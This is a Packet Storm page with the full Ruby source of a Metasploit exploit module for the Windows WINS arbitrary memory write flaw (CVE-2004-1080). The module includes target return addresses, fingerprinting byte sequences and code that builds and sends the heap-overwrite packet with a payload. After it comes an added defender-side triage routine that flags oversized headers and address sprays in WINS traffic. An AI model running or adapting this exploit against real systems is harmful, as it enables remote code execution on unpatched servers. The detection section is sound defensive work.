Microsoft WINS Service Memory Overwrite
Posted Nov 26, 2009
Authored by H D Moore | Site metasploit.com

This Metasploit module exploits an arbitrary memory write flaw in the WINS service. This exploit has been tested against Windows 2000 only.

tags | exploit, arbitrary
systems | windows
advisories | CVE-2004-1080
SHA-256 | 85c23ae114221016947e1a2b1f0f56ddc35e424cb22d9bdbcb13848d698e7ea0

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft WINS Service Memory Overwrite',
      'Description'    => %q{
        This module exploits an arbitrary memory write flaw in the
        WINS service. This exploit has been tested against Windows
        2000 only.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2004-1080'],
          [ 'OSVDB', '12378'],
          [ 'BID', '11763'],
          [ 'MSB', 'MS04-045'],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'           => 8000,
          'MinNops'         => 512,
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [
            'Windows 2000 English', # Tested OK - 11/25/2005 hdm
            {
              'Platform' => 'win',
              'Rets'     => [ 0x5391f40, 0x53df4c4, 0x53922e0],
            },
          ],
        ],
      'DisclosureDate' => 'Dec 14 2004',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(42)
      ], self.class )
  end

  def check
    ret = fprint()

    info = 'This system is running '
    info << ((ret[1] == '?') ? 'an unknown windows version ' : "Windows #{ret[1]} ")
    info << ((ret[2] == '?') ? '' : "with service pack #{ret[2]} ")
    info << (ret[3] ? '(clean heap)' : '(dirty heap)')

    print_status(info)
    return ret[0]
  end

  def exploit
    ret = fprint()

    if (ret[0] != Exploit::CheckCode::Vulnerable)
      print_status("This system does not appear to be vulnerable")
      return
    end

    # Windows 2000 SP0, SP2, SP3, SP4 only. SP1 does not have the
    # same function pointer...
    if (ret[1] != '2000' or ret[2] !~ /^[0234]/)
      print_status("This target is not currently supported")
      return
    end

    # This flag is un-set if the first leaked address is not the default of
    # 0x05371e90. This can indicate that someone has already tried to exploit
    # this system, or something major happened to the heap that will probably
    # prevent this exploit from working.
    if (not ret[3])
      print_status("Warning: the leaked heap address indicates that this attack may fail")
    end

    # The base address of our structure in memory
    base = target['Rets'][0]

    # Address of the function pointers to overwrite (courtesy anonymous donor)
    targ = target['Rets'][1]

    # Address of the payload on the heap, past the structure
    code = target['Rets'][2]

    # Build up the wins packet
    addr = ''
    addr << ([code].pack('V') * 9)
    addr << ([targ - 0x48].pack('V') * 14)

    wins = addr * 10
    wins << payload.encoded
    wins << rand_text_english(9200 - wins.length, payload_badchars)

    wpkt = [wins.length + 8, -1, base].pack('NNN')
    wpkt << wins

    print_status(sprintf("Attempting to overwrite 0x%.8x with 0x%.8x (0x%.8x)", targ, code, base))

    # Connect and send the request
    connect
    sock.put(wpkt)
    handler
    disconnect
  end

  # This fingerprinting routine will cause the structure base address to slide down
  # 120 bytes. Subsequent fingerprints will not push this down any further, however
  # we need to make sure that fingerprint is always called before exploitation or
  # the alignment will be way off.
  def fprint

    ret = [Exploit::CheckCode::Safe, '', '', '']

    req = "\x00\x00\x00\x29\x00\x00\x78\x00\x00\x00\x00\x00" +
          "\x00\x00\x00\x00\x00\x00\x00\x40\x00\x02\x00\x05" +
          "\x00\x00\x00\x00\x60\x56\x02\x01\x00\x1F\x6E\x03" +
          "\x00\x1F\x6E\x03\x08\xFE\x66\x03\x00"

    connect
    sock.put(req)
    data = sock.get_once
    return ret if not data

    ptrs = [ data[16,4].unpack('N')[0] ].concat( data[32,12].unpack('VVV') )

    print_status(sprintf("WINS Fingerprint: [0x%.8x] 0x%.8x 0x%.8x 0x%.8x", *ptrs))

    os = '2000'
    sp = '?'
    vi = false

    # Check for Windows 2000 systems
    case ptrs[3]
    when 0x77f8ae78
      sp = '0'
    when 0x77f81f70
      sp = '1'
    when 0x77f82680
      sp = '2'
    when 0x77f83608
      sp = '3'
    when 0x77f89640
      sp = '4'
    when 0x77f82518
      sp = '5'
    when 0x77f81648 # Contributed by grutz[at]jingojango.net
      sp = '3/4'
    end

    # Reset the OS string if no match was found
    os = '?' if sp == '?'

    # Check for Windows NT 4.0 systems
    if (ptrs[0] > 0x02300000 and ptrs[0] < 0x02400000)
      os = 'NT'
      sp = '?'
    end

    # Heap is still pristine...
    vi = true if ptrs[0] == 0x05371e90

    # Determine if the patch has already been applied
    req = "\x00\x00\x00\x0F\x00\x00\x78\x00" + data[16, 4] +
          "\x00\x00\x00\x03\x00\x00\x00\x00"

    sock.put(req)
    data = sock.get_once
    disconnect

    ret[1] = os
    ret[2] = sp
    ret[3] = vi

    if (data and data[6, 1] == "\x78")
      ret[0] = Exploit::CheckCode::Vulnerable
    end

    return ret
  end

end
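The module above builds its request as a 12-byte header (a big-endian length word, the constant -1, and a heap address, packed with 'NNN') followed by a body that is 23 little-endian addresses repeated ten times, then the payload and filler up to about 9200 bytes. Those traits are what a defender can key on. The following Ruby is an added, defender-side triage routine for WINS replication traffic captured on TCP/42; it is not part of the Metasploit module or of Packet Storm's page. Everything beyond the leading length word is an assumption inferred from the module's own packet layout: the meaning of the second and third header words, the 4096-byte sanity limit, the repeated-dword threshold, and the placeholder addresses used in the constructed samples (the module's real return addresses are deliberately not reused).

```ruby
# Added defender-side example: header and body triage for WINS messages
# on TCP/42. Not the Metasploit module's code. Thresholds and field
# interpretations are assumptions drawn from the packet layout the
# module builds with pack('NNN').

MAX_SANE_LEN    = 4096  # assumption: real replication messages are far below the ~9 KB the module sends
SPRAY_THRESHOLD = 32    # assumption: no legitimate body repeats a single aligned dword this often

Finding = Struct.new(:declared_len, :word2, :word3, :top_dword, :top_count, :reasons)

# Parse the 12-byte header and score the body for exploit-like traits.
# Returns nil when there is not even a full header to inspect.
def triage_wins_message(bytes)
  return nil if bytes.bytesize < 12
  declared_len, word2, word3 = bytes.unpack('NNN')
  body = bytes.byteslice(12, bytes.bytesize - 12)

  # Most frequent aligned little-endian dword in the body. The module's body
  # is 23 heap addresses repeated ten times, so an address spray stands out.
  counts = Hash.new(0)
  body.unpack('V*').each { |d| counts[d] += 1 }
  top_dword, top_count = counts.max_by { |_, c| c } || [nil, 0]

  reasons = []
  reasons << "declared length #{declared_len} exceeds #{MAX_SANE_LEN}" if declared_len > MAX_SANE_LEN
  reasons << "second header word is 0xFFFFFFFF (the module packs -1 here)" if word2 == 0xFFFFFFFF
  if top_count >= SPRAY_THRESHOLD
    reasons << format("dword 0x%08x repeated %d times (address spray)", top_dword, top_count)
  end
  Finding.new(declared_len, word2, word3, top_dword, top_count, reasons)
end

def suspicious?(bytes)
  f = triage_wins_message(bytes)
  !f.nil? && !f.reasons.empty?
end

# --- Constructed samples (not captured traffic) ---------------------------

# 1) A small, unremarkable message: 40-byte body of distinct dwords.
BENIGN_BODY   = (1..10).to_a.pack('V*')
BENIGN_SAMPLE = [BENIGN_BODY.bytesize + 8, 0x7800, 0].pack('NNN') + BENIGN_BODY

# 2) A message shaped like the module's request, with placeholder addresses
#    (hypothetical values, not the module's Rets) and random filler in place
#    of a payload.
CODE_ADDR = 0x0a0a0a0a  # placeholder
TARG_ADDR = 0x0b0b0b0b  # placeholder
BASE_ADDR = 0x0c0c0c0c  # placeholder
SPRAY      = ([CODE_ADDR].pack('V') * 9 + [TARG_ADDR].pack('V') * 14) * 10
SPRAY_BODY = SPRAY + Random.new(1).bytes(9200 - SPRAY.bytesize)
SPRAY_SAMPLE = [SPRAY_BODY.bytesize + 8, -1, BASE_ADDR].pack('NNN') + SPRAY_BODY

if __FILE__ == $0
  [['benign', BENIGN_SAMPLE], ['spray', SPRAY_SAMPLE]].each do |label, msg|
    f = triage_wins_message(msg)
    puts "#{label}: len=#{f.declared_len} word2=0x#{f.word2.to_s(16)} flagged=#{!f.reasons.empty?}"
    f.reasons.each { |r| puts "  - #{r}" }
  end
end
```

The three checks are independent, so a sensor can tune them separately: the declared-length limit catches the oversized request on its own, the 0xFFFFFFFF word is a cheap but brittle indicator, and the repeated-dword count generalises to any heap-address spray in this protocol regardless of which addresses a given target list uses. Hosts that still run WINS are best protected by the MS04-045 patch the module's fingerprint step checks for.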
packet storm

© 2022 Packet Storm. All rights reserved.